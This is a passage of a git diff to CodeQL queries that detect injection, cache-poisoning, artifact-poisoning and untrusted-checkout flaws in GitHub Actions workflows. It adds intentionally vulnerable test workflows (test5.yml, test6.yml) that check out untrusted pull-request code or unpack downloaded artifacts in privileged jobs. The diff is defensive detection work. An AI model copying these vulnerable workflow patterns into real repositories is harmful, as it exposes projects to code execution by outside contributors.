"%") or + e.getInnerExpression().matches("%." + ["head", "branch", "ref"] + "%") + ) + ) ) } } @@ -150,6 +166,22 @@ class ActionsSHACheckout extends SHACheckoutStep instanceof UsesStep { e.getFieldName().matches("%" + ["head", "sha", "commit"] + "%") ) ) + or + exists(NeedsExpression e | + this.getArgumentExpr("ref") = e and + ( + e.getNeededJobId().matches("%" + ["head", "sha", "commit"] + "%") or + e.getFieldName().matches("%" + ["head", "sha", "commit"] + "%") + ) + ) + or + exists(JsonReferenceExpression e | + this.getArgumentExpr("ref") = e and + ( + e.getAccessPath().matches("%." + ["head", "sha", "commit"] + "%") or + e.getInnerExpression().matches("%." + ["head", "sha", "commit"] + "%") + ) + ) ) } } diff --git a/ql/src/Security/CWE-077/EnvPathInjectionCritical.ql b/ql/src/Security/CWE-077/EnvPathInjectionCritical.ql index fc96c3d4353..4ff86eb0fbd 100644 --- a/ql/src/Security/CWE-077/EnvPathInjectionCritical.ql +++ b/ql/src/Security/CWE-077/EnvPathInjectionCritical.ql @@ -19,16 +19,12 @@ import EnvPathInjectionFlow::PathGraph from EnvPathInjectionFlow::PathNode source, EnvPathInjectionFlow::PathNode sink where EnvPathInjectionFlow::flowPath(source, sink) and + inPrivilegedContext(sink.getNode().asExpr()) and ( - inPrivilegedCompositeAction(sink.getNode().asExpr()) + not source.getNode().(RemoteFlowSource).getSourceType() = "artifact" or - inPrivilegedExternallyTriggerableJob(sink.getNode().asExpr()) - ) and - ( source.getNode().(RemoteFlowSource).getSourceType() = "artifact" and sink.getNode() instanceof EnvPathInjectionFromFileReadSink - or - not source.getNode().(RemoteFlowSource).getSourceType() = "artifact" ) select sink.getNode(), source, sink, "Potential PATH environment variable injection in $@, which may be controlled by an external user.", diff --git a/ql/src/Security/CWE-077/EnvPathInjectionMedium.ql b/ql/src/Security/CWE-077/EnvPathInjectionMedium.ql index cc067598c89..7ca8f4a2838 100644 --- a/ql/src/Security/CWE-077/EnvPathInjectionMedium.ql +++ b/ql/src/Security/CWE-077/EnvPathInjectionMedium.ql @@ -19,16 +19,12 @@ import EnvPathInjectionFlow::PathGraph from EnvPathInjectionFlow::PathNode source, EnvPathInjectionFlow::PathNode sink where EnvPathInjectionFlow::flowPath(source, sink) and + inNonPrivilegedContext(sink.getNode().asExpr()) and ( - inNonPrivilegedCompositeAction(sink.getNode().asExpr()) + not source.getNode().(RemoteFlowSource).getSourceType() = "artifact" or - inNonPrivilegedJob(sink.getNode().asExpr()) and - ( - not source.getNode().(RemoteFlowSource).getSourceType() = "artifact" - or - source.getNode().(RemoteFlowSource).getSourceType() = "artifact" and - sink.getNode() instanceof EnvPathInjectionFromFileReadSink - ) + source.getNode().(RemoteFlowSource).getSourceType() = "artifact" and + sink.getNode() instanceof EnvPathInjectionFromFileReadSink ) select sink.getNode(), source, sink, "Potential PATH environment variable injection in $@, which may be controlled by an external user.", diff --git a/ql/src/Security/CWE-077/EnvVarInjectionCritical.ql b/ql/src/Security/CWE-077/EnvVarInjectionCritical.ql index 4b0799ca441..320feb4e133 100644 --- a/ql/src/Security/CWE-077/EnvVarInjectionCritical.ql +++ b/ql/src/Security/CWE-077/EnvVarInjectionCritical.ql @@ -16,25 +16,17 @@ import actions import codeql.actions.security.EnvVarInjectionQuery import EnvVarInjectionFlow::PathGraph -predicate artifactToFileRead(DataFlow::Node source, DataFlow::Node sink) { - ( - not source.(RemoteFlowSource).getSourceType() = "artifact" - or - source.(RemoteFlowSource).getSourceType() = "artifact" and - sink instanceof EnvVarInjectionFromFileReadSink - ) -} - from EnvVarInjectionFlow::PathNode source, EnvVarInjectionFlow::PathNode sink where EnvVarInjectionFlow::flowPath(source, sink) and - ( - inPrivilegedCompositeAction(sink.getNode().asExpr()) - or - inPrivilegedExternallyTriggerableJob(sink.getNode().asExpr()) - ) and + inPrivilegedContext(sink.getNode().asExpr()) and // exclude paths to file read sinks from non-artifact sources - artifactToFileRead(source.getNode(), sink.getNode()) + ( + not source.getNode().(RemoteFlowSource).getSourceType() = "artifact" + or + source.getNode().(RemoteFlowSource).getSourceType() = "artifact" and + sink.getNode() instanceof EnvVarInjectionFromFileReadSink + ) select sink.getNode(), source, sink, "Potential environment variable injection in $@, which may be controlled by an external user.", sink, sink.getNode().toString() diff --git a/ql/src/Security/CWE-077/EnvVarInjectionMedium.ql b/ql/src/Security/CWE-077/EnvVarInjectionMedium.ql index 7eb239e83a0..bccb61ae6ea 100644 --- a/ql/src/Security/CWE-077/EnvVarInjectionMedium.ql +++ b/ql/src/Security/CWE-077/EnvVarInjectionMedium.ql @@ -16,24 +16,16 @@ import actions import codeql.actions.security.EnvVarInjectionQuery import EnvVarInjectionFlow::PathGraph -predicate artifactToFileRead(DataFlow::Node source, DataFlow::Node sink) { - ( - not source.(RemoteFlowSource).getSourceType() = "artifact" - or - source.(RemoteFlowSource).getSourceType() = "artifact" and - sink instanceof EnvVarInjectionFromFileReadSink - ) -} - from EnvVarInjectionFlow::PathNode source, EnvVarInjectionFlow::PathNode sink where EnvVarInjectionFlow::flowPath(source, sink) and + inNonPrivilegedContext(sink.getNode().asExpr()) and + // exclude paths to file read sinks from non-artifact sources ( - inNonPrivilegedCompositeAction(sink.getNode().asExpr()) + not source.getNode().(RemoteFlowSource).getSourceType() = "artifact" or - inNonPrivilegedJob(sink.getNode().asExpr()) and - // exclude paths to file read sinks from non-artifact sources - artifactToFileRead(source.getNode(), sink.getNode()) + source.getNode().(RemoteFlowSource).getSourceType() = "artifact" and + sink.getNode() instanceof EnvVarInjectionFromFileReadSink ) select sink.getNode(), source, sink, "Potential environment variable injection in $@, which may be controlled by an external user.", diff --git a/ql/src/Security/CWE-078/CommandInjectionCritical.ql b/ql/src/Security/CWE-078/CommandInjectionCritical.ql index 2c2ab2f2af5..68942478284 100644 --- a/ql/src/Security/CWE-078/CommandInjectionCritical.ql +++ b/ql/src/Security/CWE-078/CommandInjectionCritical.ql @@ -19,11 +19,7 @@ import CommandInjectionFlow::PathGraph from CommandInjectionFlow::PathNode source, CommandInjectionFlow::PathNode sink where CommandInjectionFlow::flowPath(source, sink) and - ( - inPrivilegedCompositeAction(sink.getNode().asExpr()) - or - inPrivilegedExternallyTriggerableJob(sink.getNode().asExpr()) - ) + inPrivilegedContext(sink.getNode().asExpr()) select sink.getNode(), source, sink, "Potential command injection in $@, which may be controlled by an external user.", sink, sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/src/Security/CWE-078/CommandInjectionMedium.ql b/ql/src/Security/CWE-078/CommandInjectionMedium.ql index 072ebbc8dce..5feacedc40b 100644 --- a/ql/src/Security/CWE-078/CommandInjectionMedium.ql +++ b/ql/src/Security/CWE-078/CommandInjectionMedium.ql @@ -19,10 +19,7 @@ import CommandInjectionFlow::PathGraph from CommandInjectionFlow::PathNode source, CommandInjectionFlow::PathNode sink where CommandInjectionFlow::flowPath(source, sink) and - ( - inNonPrivilegedCompositeAction(sink.getNode().asExpr()) or - inNonPrivilegedJob(sink.getNode().asExpr()) - ) + inNonPrivilegedContext(sink.getNode().asExpr()) select sink.getNode(), source, sink, "Potential command injection in $@, which may be controlled by an external user.", sink, sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/src/Security/CWE-094/CodeInjectionCritical.ql b/ql/src/Security/CWE-094/CodeInjectionCritical.ql index 3b968ceaf13..f37c374658a 100644 --- a/ql/src/Security/CWE-094/CodeInjectionCritical.ql +++ b/ql/src/Security/CWE-094/CodeInjectionCritical.ql @@ -17,15 +17,12 @@ import actions import codeql.actions.security.CodeInjectionQuery import CodeInjectionFlow::PathGraph +import codeql.actions.security.ControlChecks from CodeInjectionFlow::PathNode source, CodeInjectionFlow::PathNode sink where CodeInjectionFlow::flowPath(source, sink) and - ( - inPrivilegedCompositeAction(sink.getNode().asExpr()) - or - inPrivilegedExternallyTriggerableJob(sink.getNode().asExpr()) - ) and + inPrivilegedContext(sink.getNode().asExpr()) and // exclude cases where the sink is a JS script and the expression uses toJson not exists(UsesStep script | script.getCallee() = "actions/github-script" and diff --git a/ql/src/Security/CWE-094/CodeInjectionMedium.ql b/ql/src/Security/CWE-094/CodeInjectionMedium.ql index abecaf997c6..43f4eb9c38a 100644 --- a/ql/src/Security/CWE-094/CodeInjectionMedium.ql +++ b/ql/src/Security/CWE-094/CodeInjectionMedium.ql @@ -17,14 +17,12 @@ import actions import codeql.actions.security.CodeInjectionQuery import CodeInjectionFlow::PathGraph +import codeql.actions.security.ControlChecks from CodeInjectionFlow::PathNode source, CodeInjectionFlow::PathNode sink where CodeInjectionFlow::flowPath(source, sink) and - ( - inNonPrivilegedCompositeAction(sink.getNode().asExpr()) or - inNonPrivilegedJob(sink.getNode().asExpr()) - ) and + inNonPrivilegedContext(sink.getNode().asExpr()) and // exclude cases where the sink is a JS script and the expression uses toJson not exists(UsesStep script | script.getCallee() = "actions/github-script" and diff --git a/ql/src/Security/CWE-349/CachePoisoning.ql b/ql/src/Security/CWE-349/CachePoisoning.ql index f202b1fcecf..607a13e142c 100644 --- a/ql/src/Security/CWE-349/CachePoisoning.ql +++ b/ql/src/Security/CWE-349/CachePoisoning.ql @@ -15,6 +15,7 @@ import actions import codeql.actions.security.UntrustedCheckoutQuery import codeql.actions.security.CachePoisoningQuery import codeql.actions.security.PoisonableSteps +import codeql.actions.security.ControlChecks query predicate edges(Step a, Step b) { a.getAFollowingStep() = b } @@ -23,6 +24,8 @@ where j.getATriggerEvent() = e and // job can be triggered by an external user e.isExternallyTriggerable() and + // the checkout is not controlled by an access check + not exists(ControlCheck check | check.protects(checkout, j.getATriggerEvent())) and ( // the workflow runs in the context of the default branch runsOnDefaultBranch(e) @@ -51,4 +54,4 @@ where // excluding privileged workflows since they can be exploited in easier circumstances not j.isPrivileged() ) -select s, checkout, s, "Potential cache poisoning in the context of the default branch" +select s, checkout, s, "Potential cache poisoning in the context of the default branch" diff --git a/ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql b/ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql index 030dd872cb2..e7f1385f3cd 100644 --- a/ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql +++ b/ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql @@ -16,12 +16,19 @@ import actions import codeql.actions.security.CodeInjectionQuery import codeql.actions.security.CachePoisoningQuery import CodeInjectionFlow::PathGraph +import codeql.actions.security.ControlChecks from CodeInjectionFlow::PathNode source, CodeInjectionFlow::PathNode sink, LocalJob j, Event e where + CodeInjectionFlow::flowPath(source, sink) and + j = sink.getNode().asExpr().getEnclosingJob() and j.getATriggerEvent() = e and // job can be triggered by an external user e.isExternallyTriggerable() and + // the checkout is not controlled by an access check + not exists(ControlCheck check | check.protects(source.getNode().asExpr(), j.getATriggerEvent())) and + // excluding privileged workflows since they can be exploited in easier circumstances + not j.isPrivileged() and ( // the workflow runs in the context of the default branch runsOnDefaultBranch(e) @@ -32,11 +39,7 @@ where caller.getCallee() = j.getLocation().getFile().getRelativePath() and runsOnDefaultBranch(caller.getATriggerEvent()) ) - ) and - // excluding privileged workflows since they can be exploited in easier circumstances - not j.isPrivileged() and - CodeInjectionFlow::flowPath(source, sink) and - j = sink.getNode().asExpr().getEnclosingJob() + ) select sink.getNode(), source, sink, "Unprivileged code injection in $@, which may lead to cache poisoning.", sink, sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql index d28cca11a56..bbbab7bcab7 100644 --- a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql +++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql @@ -22,37 +22,14 @@ from LocalJob j, MutableRefCheckoutStep checkout, PoisonableStep s, ControlCheck where j = checkout.getEnclosingJob() and j.getAStep() = checkout and - // the checkout is followed by a known poisonable step + // the checked-out code may lead to arbitrary code execution checkout.getAFollowingStep() = s and // the checkout occurs in a privileged context - ( - inPrivilegedCompositeAction(checkout) - or - inPrivilegedExternallyTriggerableJob(checkout) - ) and - // the mutable checkout step is protected by an access check + j.isPrivilegedExternallyTriggerable() and + // the mutable checkout step is protected by an Insufficient access check check.dominates(checkout) and - // the checked-out code may lead to arbitrary code execution - checkout.getAFollowingStep() instanceof PoisonableStep and - ( - // environment gates do not depend on the triggering event - check instanceof EnvironmentCheck - or - // label gates do not depend on the triggering event - check instanceof LabelCheck - or - // actor or association gates are only bypassable for IssueOps - // since an attacker can wait for a privileged user to comment on an issue - // and then mutate the checked-out code. - // however, when used for pull_request_target, the check is not bypassable since - // the actor checked is the author of the PR - ( - check instanceof AssociationCheck or - check instanceof ActorCheck or - check instanceof PermissionCheck - ) and - check.getEnclosingJob().getATriggerEvent().getName().matches("%_comment") - ) + check.protects(checkout, j.getATriggerEvent()) and + check.protectsAgainstRefMutationAttacks() = false select s, checkout, s, "Insufficient protection against execution of untrusted code on a privileged workflow on check $@.", check, check.toString() diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql index 6448f1a05a8..b9b3154debf 100644 --- a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql +++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql @@ -16,37 +16,18 @@ import codeql.actions.security.UntrustedCheckoutQuery import codeql.actions.security.PoisonableSteps import codeql.actions.security.ControlChecks -from MutableRefCheckoutStep checkout, ControlCheck check +from LocalJob j, MutableRefCheckoutStep checkout, ControlCheck check where - // the checkout occurs in a privileged context - ( - inPrivilegedCompositeAction(checkout) - or - inPrivilegedExternallyTriggerableJob(checkout) - ) and + j = checkout.getEnclosingJob() and + j.getAStep() = checkout and // there are no evidences that the checked-out gets executed not checkout.getAFollowingStep() instanceof PoisonableStep and - // the mutable checkout step is protected by an access check + // the checkout occurs in a privileged context + j.isPrivilegedExternallyTriggerable() and + // the mutable checkout step is protected by an Insufficient access check check.dominates(checkout) and - ( - // environment gates do not depend on the triggering event - check instanceof EnvironmentCheck - or - // label gates do not depend on the triggering event - check instanceof LabelCheck - or - // actor or association gates are only bypassable for IssueOps - // since an attacker can wait for a privileged user to comment on an issue - // and then mutate the checked-out code. - // however, when used for pull_request_target, the check is not bypassable since - // the actor checked is the author of the PR - ( - check instanceof AssociationCheck or - check instanceof ActorCheck or - check instanceof PermissionCheck - ) and - check.getEnclosingJob().getATriggerEvent().getName().matches("%_comment") - ) + check.protects(checkout, j.getATriggerEvent()) and + check.protectsAgainstRefMutationAttacks() = false select checkout, "Insufficient protection against execution of untrusted code on a privileged workflow on step $@.", check, check.toString() diff --git a/ql/src/Security/CWE-829/ArtifactPoisoningCritical.ql b/ql/src/Security/CWE-829/ArtifactPoisoningCritical.ql index a7d2518564d..82c6f936c51 100644 --- a/ql/src/Security/CWE-829/ArtifactPoisoningCritical.ql +++ b/ql/src/Security/CWE-829/ArtifactPoisoningCritical.ql @@ -14,15 +14,12 @@ import actions import codeql.actions.security.ArtifactPoisoningQuery import ArtifactPoisoningFlow::PathGraph +import codeql.actions.security.ControlChecks from ArtifactPoisoningFlow::PathNode source, ArtifactPoisoningFlow::PathNode sink where ArtifactPoisoningFlow::flowPath(source, sink) and - ( - inPrivilegedCompositeAction(sink.getNode().asExpr()) - or - inPrivilegedExternallyTriggerableJob(sink.getNode().asExpr()) - ) + inPrivilegedContext(sink.getNode().asExpr()) select sink.getNode(), source, sink, "Potential artifact poisoning in $@, which may be controlled by an external user.", sink, sink.getNode().toString() diff --git a/ql/src/Security/CWE-829/ArtifactPoisoningMedium.ql b/ql/src/Security/CWE-829/ArtifactPoisoningMedium.ql index a4fb958b7f9..992b2aa8c5d 100644 --- a/ql/src/Security/CWE-829/ArtifactPoisoningMedium.ql +++ b/ql/src/Security/CWE-829/ArtifactPoisoningMedium.ql @@ -14,14 +14,12 @@ import actions import codeql.actions.security.ArtifactPoisoningQuery import ArtifactPoisoningFlow::PathGraph +import codeql.actions.security.ControlChecks from ArtifactPoisoningFlow::PathNode source, ArtifactPoisoningFlow::PathNode sink where ArtifactPoisoningFlow::flowPath(source, sink) and - ( - inNonPrivilegedCompositeAction(sink.getNode().asExpr()) or - inNonPrivilegedJob(sink.getNode().asExpr()) - ) + inNonPrivilegedContext(sink.getNode().asExpr()) select sink.getNode(), source, sink, "Potential artifact poisoning in $@, which may be controlled by an external user.", sink, sink.getNode().toString() diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql index c1d72dd4664..a0da81bde22 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql @@ -27,11 +27,5 @@ where // the checkout is followed by a known poisonable step checkout.getAFollowingStep() = s and // the checkout occurs in a privileged context - ( - inPrivilegedCompositeAction(checkout) - or - inPrivilegedExternallyTriggerableJob(checkout) - ) and - // the checkout is not controlled by an access check - not exists(ControlCheck check | check.dominates(checkout)) + inPrivilegedContext(checkout) select s, checkout, s, "Execution of untrusted code on a privileged workflow." diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql b/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql index 468a1214c62..dba0dadb61b 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql @@ -25,11 +25,5 @@ where // the checkout is NOT followed by a known poisonable step not checkout.getAFollowingStep() instanceof PoisonableStep and // the checkout occurs in a privileged context - ( - inPrivilegedCompositeAction(checkout) - or - inPrivilegedExternallyTriggerableJob(checkout) - ) and - // the checkout is not controlled by an access check - not exists(ControlCheck check | check.dominates(checkout)) + inPrivilegedContext(checkout) select checkout, "Potential execution of untrusted code on a privileged workflow." diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutMedium.ql b/ql/src/Security/CWE-829/UntrustedCheckoutMedium.ql index 3edde8dcf54..ca91fcb9048 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutMedium.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckoutMedium.ql @@ -22,11 +22,6 @@ from LocalJob j, PRHeadCheckoutStep checkout where j = checkout.getEnclosingJob() and j.getAStep() = checkout and - // the checkout is not controlled by an access check - not exists(ControlCheck check | check.dominates(checkout)) and // the checkout occurs in a non-privileged context - ( - inNonPrivilegedCompositeAction(checkout) or - inNonPrivilegedJob(checkout) - ) + inNonPrivilegedContext(checkout) select checkout, "Potential unsafe checkout of untrusted pull request on privileged workflow." diff --git a/ql/test/query-tests/Security/CWE-367/.github/workflows/comment.yml b/ql/test/query-tests/Security/CWE-367/.github/workflows/comment.yml index 498b46090cb..a4acd738766 100644 --- a/ql/test/query-tests/Security/CWE-367/.github/workflows/comment.yml +++ b/ql/test/query-tests/Security/CWE-367/.github/workflows/comment.yml @@ -5,13 +5,11 @@ on: types: [created] permissions: 'write-all' jobs: - benchmark: - name: Integration Tests + test1: if: ${{ github.event.issue.pull_request && contains(fromJson('["MEMBER", "OWNER"]'), github.event.comment.author_association) && startsWith(github.event.comment.body, '/run-tests ') }} - runs-on: [ubuntu-latest] + runs-on: ubuntu-latest steps: - # test1 - uses: actions/github-script@v6 name: Get PR branch id: issue @@ -33,7 +31,36 @@ jobs: ref: ${{ fromJson(steps.issue.outputs.result).sha }} - run: bash comment_example/tests.sh - # test2 + test2: + if: ${{ github.event.issue.pull_request && contains(fromJson('["MEMBER", "OWNER"]'), github.event.comment.author_association) && startsWith(github.event.comment.body, '/run-tests ') }} + runs-on: ubuntu-latest + steps: + + - uses: actions/github-script@v6 + name: Get PR branch + id: issue + with: + script: | + const pr = context.payload.issue.number + const data = await github.rest.pulls.get({ + owner: context.repo.owner, + repo: context.repo.repo, + pull_number: pr + }) + return { + ref: data.data.head.ref, + sha: data.data.head.sha, + } + - uses: actions/checkout@v4 + with: + submodules: recursive + ref: ${{ fromJson(steps.issue.outputs.result).ref }} + - run: bash comment_example/tests.sh + + test3: + if: ${{ github.event.issue.pull_request && contains(fromJson('["MEMBER", "OWNER"]'), github.event.comment.author_association) && startsWith(github.event.comment.body, '/run-tests ') }} + runs-on: ubuntu-latest + steps: - uses: actions/checkout@v4 with: submodules: recursive diff --git a/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.expected b/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.expected index 01045ddde5e..e2c4d966063 100644 --- a/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.expected +++ b/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.expected @@ -1,15 +1,12 @@ edges | .github/workflows/actor.yml:17:9:20:6 | Uses Step | .github/workflows/actor.yml:20:9:21:16 | Run Step | -| .github/workflows/comment.yml:15:9:30:6 | Uses Step: issue | .github/workflows/comment.yml:30:9:34:6 | Uses Step | -| .github/workflows/comment.yml:15:9:30:6 | Uses Step: issue | .github/workflows/comment.yml:34:9:37:6 | Run Step | -| .github/workflows/comment.yml:15:9:30:6 | Uses Step: issue | .github/workflows/comment.yml:37:9:41:6 | Uses Step | -| .github/workflows/comment.yml:15:9:30:6 | Uses Step: issue | .github/workflows/comment.yml:41:9:41:43 | Run Step | -| .github/workflows/comment.yml:30:9:34:6 | Uses Step | .github/workflows/comment.yml:34:9:37:6 | Run Step | -| .github/workflows/comment.yml:30:9:34:6 | Uses Step | .github/workflows/comment.yml:37:9:41:6 | Uses Step | -| .github/workflows/comment.yml:30:9:34:6 | Uses Step | .github/workflows/comment.yml:41:9:41:43 | Run Step | -| .github/workflows/comment.yml:34:9:37:6 | Run Step | .github/workflows/comment.yml:37:9:41:6 | Uses Step | -| .github/workflows/comment.yml:34:9:37:6 | Run Step | .github/workflows/comment.yml:41:9:41:43 | Run Step | -| .github/workflows/comment.yml:37:9:41:6 | Uses Step | .github/workflows/comment.yml:41:9:41:43 | Run Step | +| .github/workflows/comment.yml:13:9:28:6 | Uses Step: issue | .github/workflows/comment.yml:28:9:32:6 | Uses Step | +| .github/workflows/comment.yml:13:9:28:6 | Uses Step: issue | .github/workflows/comment.yml:32:9:34:2 | Run Step | +| .github/workflows/comment.yml:28:9:32:6 | Uses Step | .github/workflows/comment.yml:32:9:34:2 | Run Step | +| .github/workflows/comment.yml:39:9:54:6 | Uses Step: issue | .github/workflows/comment.yml:54:9:58:6 | Uses Step | +| .github/workflows/comment.yml:39:9:54:6 | Uses Step: issue | .github/workflows/comment.yml:58:9:60:2 | Run Step | +| .github/workflows/comment.yml:54:9:58:6 | Uses Step | .github/workflows/comment.yml:58:9:60:2 | Run Step | +| .github/workflows/comment.yml:64:9:68:6 | Uses Step | .github/workflows/comment.yml:68:9:68:43 | Run Step | | .github/workflows/deployment.yml:16:10:22:7 | Uses Step | .github/workflows/deployment.yml:22:10:27:7 | Uses Step | | .github/workflows/deployment.yml:16:10:22:7 | Uses Step | .github/workflows/deployment.yml:27:10:30:7 | Run Step | | .github/workflows/deployment.yml:16:10:22:7 | Uses Step | .github/workflows/deployment.yml:30:10:31:53 | Run Step | @@ -19,7 +16,6 @@ edges | .github/workflows/label.yml:13:9:17:6 | Uses Step | .github/workflows/label.yml:17:9:17:41 | Run Step | | .github/workflows/label_actor.yml:13:9:17:6 | Uses Step | .github/workflows/label_actor.yml:17:9:17:41 | Run Step | #select -| .github/workflows/comment.yml:41:9:41:43 | Run Step | .github/workflows/comment.yml:37:9:41:6 | Uses Step | .github/workflows/comment.yml:41:9:41:43 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow on check $@. | .github/workflows/comment.yml:10:9:10:188 | ${{ git ... s ') }} | ${{ git ... s ') }} | | .github/workflows/deployment.yml:27:10:30:7 | Run Step | .github/workflows/deployment.yml:16:10:22:7 | Uses Step | .github/workflows/deployment.yml:27:10:30:7 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow on check $@. | .github/workflows/deployment.yml:13:19:13:27 | Public CI | Public CI | | .github/workflows/deployment.yml:30:10:31:53 | Run Step | .github/workflows/deployment.yml:16:10:22:7 | Uses Step | .github/workflows/deployment.yml:30:10:31:53 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow on check $@. | .github/workflows/deployment.yml:13:19:13:27 | Public CI | Public CI | | .github/workflows/label.yml:17:9:17:41 | Run Step | .github/workflows/label.yml:13:9:17:6 | Uses Step | .github/workflows/label.yml:17:9:17:41 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow on check $@. | .github/workflows/label.yml:11:9:11:73 | contain ... -test') | contain ... -test') | diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test5.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/test5.yml new file mode 100644 index 00000000000..a4acd738766 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/test5.yml @@ -0,0 +1,68 @@ +# https://github.com/AdnaneKhan/ActionsTOCTOU/blob/main/.github/workflows/comment_victim.yml +name: Comment Triggered Test +on: + issue_comment: + types: [created] +permissions: 'write-all' +jobs: + test1: + if: ${{ github.event.issue.pull_request && contains(fromJson('["MEMBER", "OWNER"]'), github.event.comment.author_association) && startsWith(github.event.comment.body, '/run-tests ') }} + runs-on: ubuntu-latest + steps: + + - uses: actions/github-script@v6 + name: Get PR branch + id: issue + with: + script: | + const pr = context.payload.issue.number + const data = await github.rest.pulls.get({ + owner: context.repo.owner, + repo: context.repo.repo, + pull_number: pr + }) + return { + ref: data.data.head.ref, + sha: data.data.head.sha, + } + - uses: actions/checkout@v4 + with: + submodules: recursive + ref: ${{ fromJson(steps.issue.outputs.result).sha }} + - run: bash comment_example/tests.sh + + test2: + if: ${{ github.event.issue.pull_request && contains(fromJson('["MEMBER", "OWNER"]'), github.event.comment.author_association) && startsWith(github.event.comment.body, '/run-tests ') }} + runs-on: ubuntu-latest + steps: + + - uses: actions/github-script@v6 + name: Get PR branch + id: issue + with: + script: | + const pr = context.payload.issue.number + const data = await github.rest.pulls.get({ + owner: context.repo.owner, + repo: context.repo.repo, + pull_number: pr + }) + return { + ref: data.data.head.ref, + sha: data.data.head.sha, + } + - uses: actions/checkout@v4 + with: + submodules: recursive + ref: ${{ fromJson(steps.issue.outputs.result).ref }} + - run: bash comment_example/tests.sh + + test3: + if: ${{ github.event.issue.pull_request && contains(fromJson('["MEMBER", "OWNER"]'), github.event.comment.author_association) && startsWith(github.event.comment.body, '/run-tests ') }} + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + with: + submodules: recursive + ref: "refs/pull/${{ github.event.number }}/merge" + - run: bash comment_example/tests.sh diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test6.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/test6.yml new file mode 100644 index 00000000000..f532e4266ad --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/test6.yml @@ -0,0 +1,45 @@ +name: Test + + +on: + workflow_run: + workflows: ["Foo"] + types: + - completed + +jobs: + docker: + runs-on: ubuntu-latest + if: > + github.event.workflow_run.event == 'pull_request' && + github.event.workflow_run.conclusion == 'success' + outputs: + version-json: ${{ steps.show_versions.outputs.version-json }} + steps: + - name: 'Download artifact' + uses: actions/github-script@v3.1.0 + with: + script: | + var artifacts = await github.actions.listWorkflowRunArtifacts({ + owner: context.repo.owner, + repo: context.repo.repo, + run_id: ${{ github.event.workflow_run.id }}, + }); + var matchArtifactNacos = artifacts.data.artifacts.filter((artifact) => { + return artifact.name == "nacos" + })[0]; + var download = await github.actions.downloadArtifact({ + owner: context.repo.owner, + repo: context.repo.repo, + artifact_id: matchArtifactNacos.id, + archive_format: 'zip', + }); + var fs = require('fs'); + fs.writeFileSync('${{github.workspace}}/nacos.zip', Buffer.from(download.data)); + - run: | + unzip nacos.zip + mkdir nacos + cp -r nacos-* nacos/ + - name: save docker_2 images + run: | + mv ./build_backup/* nacos-e2e/cicd/build/ diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 87289c178af..78e2afa2747 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected @@ -294,6 +294,16 @@ edges | .github/workflows/test4.yml:41:7:42:4 | Run Step | .github/workflows/test4.yml:42:7:43:4 | Run Step | | .github/workflows/test4.yml:41:7:42:4 | Run Step | .github/workflows/test4.yml:43:7:46:39 | Uses Step | | .github/workflows/test4.yml:42:7:43:4 | Run Step | .github/workflows/test4.yml:43:7:46:39 | Uses Step | +| .github/workflows/test5.yml:13:9:28:6 | Uses Step: issue | .github/workflows/test5.yml:28:9:32:6 | Uses Step | +| .github/workflows/test5.yml:13:9:28:6 | Uses Step: issue | .github/workflows/test5.yml:32:9:34:2 | Run Step | +| .github/workflows/test5.yml:28:9:32:6 | Uses Step | .github/workflows/test5.yml:32:9:34:2 | Run Step | +| .github/workflows/test5.yml:39:9:54:6 | Uses Step: issue | .github/workflows/test5.yml:54:9:58:6 | Uses Step | +| .github/workflows/test5.yml:39:9:54:6 | Uses Step: issue | .github/workflows/test5.yml:58:9:60:2 | Run Step | +| .github/workflows/test5.yml:54:9:58:6 | Uses Step | .github/workflows/test5.yml:58:9:60:2 | Run Step | +| .github/workflows/test5.yml:64:9:68:6 | Uses Step | .github/workflows/test5.yml:68:9:68:43 | Run Step | +| .github/workflows/test6.yml:19:9:39:6 | Uses Step | .github/workflows/test6.yml:39:9:43:6 | Run Step | +| 